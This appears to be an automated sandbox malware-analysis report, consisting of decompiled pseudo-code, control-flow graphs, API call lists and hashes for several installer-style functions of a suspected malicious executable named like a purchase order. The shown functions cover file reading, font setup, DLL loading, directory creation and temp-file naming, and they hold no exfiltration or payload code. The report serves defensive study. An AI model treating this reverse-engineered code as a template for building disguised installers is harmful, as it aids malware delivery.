                                                                      control_flow_graph 881 402644-40265d call 402c15 884 402663-40266a 881->884 885 402abf-402ac2 881->885 887 40266c 884->887 888 40266f-402672 884->888 886 402ac8-402ace 885->886 887->888 889 4027d6-4027de 888->889 890 402678-402687 call 406310 888->890 889->885 890->889 894 40268d 890->894 895 402693-402697 894->895 896 40272c-40272f 895->896 897 40269d-4026b8 ReadFile 895->897 899 402731-402734 896->899 900 402747-402757 call 405f25 896->900 897->889 898 4026be-4026c3 897->898 898->889 903 4026c9-4026d7 898->903 899->900 901 402736-402741 call 405f83 899->901 900->889 909 402759 900->909 901->889 901->900 906 402792-40279e call 4062f7 903->906 907 4026dd-4026ef MultiByteToWideChar 903->907 906->886 907->909 910 4026f1-4026f4 907->910 912 40275c-40275f 909->912 913 4026f6-402701 910->913 912->906 915 402761-402766 912->915 913->912 916 402703-402728 SetFilePointer MultiByteToWideChar 913->916 917 4027a3-4027a7 915->917 918 402768-40276d 915->918 916->913 919 40272a 916->919 920 4027c4-4027d0 SetFilePointer 917->920 921 4027a9-4027ad 917->921 918->917 922 40276f-402782 918->922 919->909 920->889 923 4027b5-4027c2 921->923 924 4027af-4027b3 921->924 922->889 925 402784-40278a 922->925 923->889 924->920 924->923 925->895 926 402790 925->926 926->889
                                                                      C-Code - Quality: 83%
                                                                      			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr _t66;
                                                                      				intOrPtr _t72;
                                                                      				void* _t76;
                                                                      				void* _t79;
                                                                      
                                                                      				_t72 = __edx;
                                                                      				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                      				_t65 = 2;
                                                                      				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
                                                                      				_t66 = E00402C15(_t65);
                                                                      				_t79 = _t66 - 1;
                                                                      				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
                                                                      				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
                                                                      				if(_t79 < 0) {
                                                                      					L36:
                                                                      					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                                      				} else {
                                                                      					__ecx = 0x3ff;
                                                                      					if(__eax > 0x3ff) {
                                                                      						 *(__ebp - 0x3c) = 0x3ff;
                                                                      					}
                                                                      					if( *__esi == __bx) {
                                                                      						L34:
                                                                      						__ecx =  *(__ebp - 0xc);
                                                                      						__eax =  *(__ebp - 8);
                                                                      						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                      						if(_t79 == 0) {
                                                                      							 *(_t76 - 4) = 1;
                                                                      						}
                                                                      						goto L36;
                                                                      					} else {
                                                                      						 *(__ebp - 0x30) = __ebx;
                                                                      						 *(__ebp - 0x10) = E00406310(__ecx, __esi);
                                                                      						if( *(__ebp - 0x3c) > __ebx) {
                                                                      							do {
                                                                      								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
                                                                      									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405F83( *(__ebp - 0x10), __ebx) >= 0) {
                                                                      										__eax = __ebp - 0x44;
                                                                      										if(E00405F25( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
                                                                      											goto L34;
                                                                      										} else {
                                                                      											goto L21;
                                                                      										}
                                                                      									} else {
                                                                      										goto L34;
                                                                      									}
                                                                      								} else {
                                                                      									__eax = __ebp - 0x38;
                                                                      									_push(__ebx);
                                                                      									_push(__ebp - 0x38);
                                                                      									__eax = 2;
                                                                      									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
                                                                      									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
                                                                      									if(__eax == 0) {
                                                                      										goto L34;
                                                                      									} else {
                                                                      										__ecx =  *(__ebp - 0x38);
                                                                      										if(__ecx == __ebx) {
                                                                      											goto L34;
                                                                      										} else {
                                                                      											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                      											 *(__ebp - 0x48) = __ecx;
                                                                      											 *(__ebp - 0x44) = __eax;
                                                                      											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                      												L28:
                                                                      												__ax & 0x0000ffff = E004062F7( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                      											} else {
                                                                      												__ebp - 0x44 = __ebp + 0xa;
                                                                      												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
                                                                      													L21:
                                                                      													__eax =  *(__ebp - 0x44);
                                                                      												} else {
                                                                      													__esi =  *(__ebp - 0x48);
                                                                      													__esi =  ~( *(__ebp - 0x48));
                                                                      													while(1) {
                                                                      														_t22 = __ebp - 0x38;
                                                                      														 *_t22 =  *(__ebp - 0x38) - 1;
                                                                      														__eax = 0xfffd;
                                                                      														 *(__ebp - 0x44) = 0xfffd;
                                                                      														if( *_t22 == 0) {
                                                                      															goto L22;
                                                                      														}
                                                                      														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
                                                                      														__esi = __esi + 1;
                                                                      														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
                                                                      														__ebp - 0x44 = __ebp + 0xa;
                                                                      														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
                                                                      															continue;
                                                                      														} else {
                                                                      															goto L21;
                                                                      														}
                                                                      														goto L22;
                                                                      													}
                                                                      												}
                                                                      												L22:
                                                                      												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                      													goto L28;
                                                                      												} else {
                                                                      													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
                                                                      														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                      															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
                                                                      															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
                                                                      														} else {
                                                                      															__ecx =  *(__ebp - 0xc);
                                                                      															__edx =  *(__ebp - 8);
                                                                      															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                      															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                      														}
                                                                      														goto L34;
                                                                      													} else {
                                                                      														__ecx =  *(__ebp - 0xc);
                                                                      														__edx =  *(__ebp - 8);
                                                                      														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                      														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                      														 *(__ebp - 0x30) = __eax;
                                                                      														if(__ax == __bx) {
                                                                      															goto L34;
                                                                      														} else {
                                                                      															goto L26;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								goto L37;
                                                                      								L26:
                                                                      								__eax =  *(__ebp - 8);
                                                                      							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
                                                                      						}
                                                                      						goto L34;
                                                                      					}
                                                                      				}
                                                                      				L37:
                                                                      				return 0;
                                                                      			}








                                                                      0x00402644
                                                                      0x00402646
                                                                      0x00402649
                                                                      0x0040264b
                                                                      0x0040264e
                                                                      0x00402653
                                                                      0x00402657
                                                                      0x0040265a
                                                                      0x0040265d
                                                                      0x00402abf
                                                                      0x00402ac2
                                                                      0x00402663
                                                                      0x00402663
                                                                      0x0040266a
                                                                      0x0040266c
                                                                      0x0040266c
                                                                      0x00402672
                                                                      0x004027d6
                                                                      0x004027d6
                                                                      0x004027d9
                                                                      0x004027de
                                                                      0x004015b6
                                                                      0x00402885
                                                                      0x00402885
                                                                      0x00000000
                                                                      0x00402678
                                                                      0x00402679
                                                                      0x00402684
                                                                      0x00402687
                                                                      0x00402693
                                                                      0x00402697
                                                                      0x0040272f
                                                                      0x00402747
                                                                      0x00402757
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040269d
                                                                      0x0040269d
                                                                      0x004026a0
                                                                      0x004026a1
                                                                      0x004026a4
                                                                      0x004026a9
                                                                      0x004026b0
                                                                      0x004026b8
                                                                      0x00000000
                                                                      0x004026be
                                                                      0x004026be
                                                                      0x004026c3
                                                                      0x00000000
                                                                      0x004026c9
                                                                      0x004026c9
                                                                      0x004026d1
                                                                      0x004026d4
                                                                      0x004026d7
                                                                      0x00402792
                                                                      0x00402799
                                                                      0x004026dd
                                                                      0x004026e3
                                                                      0x004026ef
                                                                      0x00402759
                                                                      0x00402759
                                                                      0x004026f1
                                                                      0x004026f1
                                                                      0x004026f4
                                                                      0x004026f6
                                                                      0x004026f6
                                                                      0x004026f6
                                                                      0x004026f9
                                                                      0x004026fe
                                                                      0x00402701
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402703
                                                                      0x00402706
                                                                      0x0040270e
                                                                      0x0040271a
                                                                      0x00402728
                                                                      0x00000000
                                                                      0x0040272a
                                                                      0x00000000
                                                                      0x0040272a
                                                                      0x00000000
                                                                      0x00402728
                                                                      0x004026f6
                                                                      0x0040275c
                                                                      0x0040275f
                                                                      0x00000000
                                                                      0x00402761
                                                                      0x00402766
                                                                      0x004027a7
                                                                      0x004027c9
                                                                      0x004027d0
                                                                      0x004027b5
                                                                      0x004027b5
                                                                      0x004027b8
                                                                      0x004027bb
                                                                      0x004027be
                                                                      0x004027be
                                                                      0x00000000
                                                                      0x0040276f
                                                                      0x0040276f
                                                                      0x00402772
                                                                      0x00402775
                                                                      0x0040277b
                                                                      0x0040277f
                                                                      0x00402782
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402782
                                                                      0x00402766
                                                                      0x0040275f
                                                                      0x004026d7
                                                                      0x004026c3
                                                                      0x004026b8
                                                                      0x00000000
                                                                      0x00402784
                                                                      0x00402784
                                                                      0x00402787
                                                                      0x00402790
                                                                      0x00000000
                                                                      0x00402687
                                                                      0x00402672
                                                                      0x00402ac8
                                                                      0x00402ace

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                        • Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405F99
                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                      • String ID: 9
                                                                      • API String ID: 163830602-2366072709
                                                                      • Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                      • Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
                                                                      • Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                      • Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 73%
                                                                      			E00401DB3(intOrPtr __edx) {
                                                                      				void* __esi;
                                                                      				int _t9;
                                                                      				signed char _t15;
                                                                      				struct HFONT__* _t18;
                                                                      				intOrPtr _t30;
                                                                      				struct HDC__* _t31;
                                                                      				void* _t33;
                                                                      				void* _t35;
                                                                      
                                                                      				_t30 = __edx;
                                                                      				_t31 = GetDC( *(_t35 - 8));
                                                                      				_t9 = E00402C15(2);
                                                                      				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                      				0x40cde0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                      				ReleaseDC( *(_t35 - 8), _t31);
                                                                      				 *0x40cdf0 = E00402C15(3);
                                                                      				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                      				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                      				 *0x40cdf7 = 1;
                                                                      				 *0x40cdf4 = _t15 & 0x00000001;
                                                                      				 *0x40cdf5 = _t15 & 0x00000002;
                                                                      				 *0x40cdf6 = _t15 & 0x00000004;
                                                                      				E004063D2(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
                                                                      				_t18 = CreateFontIndirectW(0x40cde0); // executed
                                                                      				_push(_t18);
                                                                      				_push(_t33);
                                                                      				E004062F7();
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                      				return 0;
                                                                      			}











                                                                      0x00401db3
                                                                      0x00401dbe
                                                                      0x00401dc0
                                                                      0x00401dcd
                                                                      0x00401de4
                                                                      0x00401de9
                                                                      0x00401df6
                                                                      0x00401dfb
                                                                      0x00401dff
                                                                      0x00401e0a
                                                                      0x00401e11
                                                                      0x00401e23
                                                                      0x00401e29
                                                                      0x00401e2e
                                                                      0x00401e38
                                                                      0x0040258c
                                                                      0x0040156d
                                                                      0x00402a65
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401DB6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                      • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID: Calibri
                                                                      • API String ID: 3808545654-1409258342
                                                                      • Opcode ID: 331e2bd8f52134edb3c64bcd1810fd6956bccb8f00eaf7712ca7db7d847b41c1
                                                                      • Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
                                                                      • Opcode Fuzzy Hash: 331e2bd8f52134edb3c64bcd1810fd6956bccb8f00eaf7712ca7db7d847b41c1
                                                                      • Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 940 40671a-40673a GetSystemDirectoryW 941 40673c 940->941 942 40673e-406740 940->942 941->942 943 406751-406753 942->943 944 406742-40674b 942->944 945 406754-406787 wsprintfW LoadLibraryExW 943->945 944->943 946 40674d-40674f 944->946 946->945
                                                                      C-Code - Quality: 100%
                                                                      			E0040671A(intOrPtr _a4) {
                                                                      				short _v576;
                                                                      				signed int _t13;
                                                                      				struct HINSTANCE__* _t17;
                                                                      				signed int _t19;
                                                                      				void* _t24;
                                                                      
                                                                      				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                      				if(_t13 > 0x104) {
                                                                      					_t13 = 0;
                                                                      				}
                                                                      				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                      					_t19 = 1;
                                                                      				} else {
                                                                      					_t19 = 0;
                                                                      				}
                                                                      				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                      				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                      				return _t17;
                                                                      			}








                                                                      0x00406731
                                                                      0x0040673a
                                                                      0x0040673c
                                                                      0x0040673c
                                                                      0x00406740
                                                                      0x00406753
                                                                      0x0040674d
                                                                      0x0040674d
                                                                      0x0040674d
                                                                      0x0040676c
                                                                      0x00406780
                                                                      0x00406787

                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                      • wsprintfW.USER32 ref: 0040676C
                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406780
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-1946221925
                                                                      • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                      • Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
                                                                      • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                      • Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 947 4058e3-40592e CreateDirectoryW 948 405930-405932 947->948 949 405934-405941 GetLastError 947->949 950 40595b-40595d 948->950 949->950 951 405943-405957 SetFileSecurityW 949->951 951->948 952 405959 GetLastError 951->952 952->950
                                                                      C-Code - Quality: 100%
                                                                      			E004058E3(WCHAR* _a4) {
                                                                      				struct _SECURITY_ATTRIBUTES _v16;
                                                                      				struct _SECURITY_DESCRIPTOR _v36;
                                                                      				int _t22;
                                                                      				long _t23;
                                                                      
                                                                      				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                      				_v36.Owner = 0x4083f0;
                                                                      				_v36.Group = 0x4083f0;
                                                                      				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                      				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                      				_v16.lpSecurityDescriptor =  &_v36;
                                                                      				_v36.Revision = 1;
                                                                      				_v36.Control = 4;
                                                                      				_v36.Dacl = 0x4083e0;
                                                                      				_v16.nLength = 0xc;
                                                                      				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                      				if(_t22 != 0) {
                                                                      					L1:
                                                                      					return 0;
                                                                      				}
                                                                      				_t23 = GetLastError();
                                                                      				if(_t23 == 0xb7) {
                                                                      					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					return GetLastError();
                                                                      				}
                                                                      				return _t23;
                                                                      			}







                                                                      0x004058ee
                                                                      0x004058f2
                                                                      0x004058f5
                                                                      0x004058fb
                                                                      0x004058ff
                                                                      0x00405903
                                                                      0x0040590b
                                                                      0x00405912
                                                                      0x00405918
                                                                      0x0040591f
                                                                      0x00405926
                                                                      0x0040592e
                                                                      0x00405930
                                                                      0x00000000
                                                                      0x00405930
                                                                      0x0040593a
                                                                      0x00405941
                                                                      0x00405957
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405959
                                                                      0x0040595d

                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                      • GetLastError.KERNEL32 ref: 0040593A
                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
                                                                      • GetLastError.KERNEL32 ref: 00405959
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 3449924974-3370423016
                                                                      • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                      • Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
                                                                      • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                      • Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 953 405ed1-405edd 954 405ede-405f12 GetTickCount GetTempFileNameW 953->954 955 405f21-405f23 954->955 956 405f14-405f16 954->956 958 405f1b-405f1e 955->958 956->954 957 405f18 956->957 957->958
                                                                      C-Code - Quality: 100%
                                                                      			E00405ED1(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                      				intOrPtr _v8;
                                                                      				short _v12;
                                                                      				short _t12;
                                                                      				intOrPtr _t13;
                                                                      				signed int _t14;
                                                                      				WCHAR* _t17;
                                                                      				signed int _t19;
                                                                      				signed short _t23;
                                                                      				WCHAR* _t26;
                                                                      
                                                                      				_t26 = _a4;
                                                                      				_t23 = 0x64;
                                                                      				while(1) {
                                                                      					_t12 =  *L"nsa"; // 0x73006e
                                                                      					_t23 = _t23 - 1;
                                                                      					_v12 = _t12;
                                                                      					_t13 =  *0x40a58c; // 0x61
                                                                      					_v8 = _t13;
                                                                      					_t14 = GetTickCount();
                                                                      					_t19 = 0x1a;
                                                                      					_v8 = _v8 + _t14 % _t19;
                                                                      					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                      					if(_t17 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(_t23 != 0) {
                                                                      						continue;
                                                                      					} else {
                                                                      						 *_t26 =  *_t26 & _t23;
                                                                      					}
                                                                      					L4:
                                                                      					return _t17;
                                                                      				}
                                                                      				_t17 = _t26;
                                                                      				goto L4;
                                                                      			}












                                                                      0x00405ed7
                                                                      0x00405edd
                                                                      0x00405ede
                                                                      0x00405ede
                                                                      0x00405ee3
                                                                      0x00405ee4
                                                                      0x00405ee7
                                                                      0x00405eec
                                                                      0x00405eef
                                                                      0x00405ef9
                                                                      0x00405f06
                                                                      0x00405f0a
                                                                      0x00405f12
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405f16
                                                                      0x00000000
                                                                      0x00405f18
                                                                      0x00405f18
                                                                      0x00405f18
                                                                      0x00405f1b
                                                                      0x00405f1e
                                                                      0x00405f1e
                                                                      0x00405f21
                                                                      0x00000000

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405EEF
                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PO No. 3200005919.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75703420,004036D5), ref: 00405F0A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\user\Desktop\PO No. 3200005919.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-3565518634
                                                                      • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                      • Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
                                                                      • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                      • Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
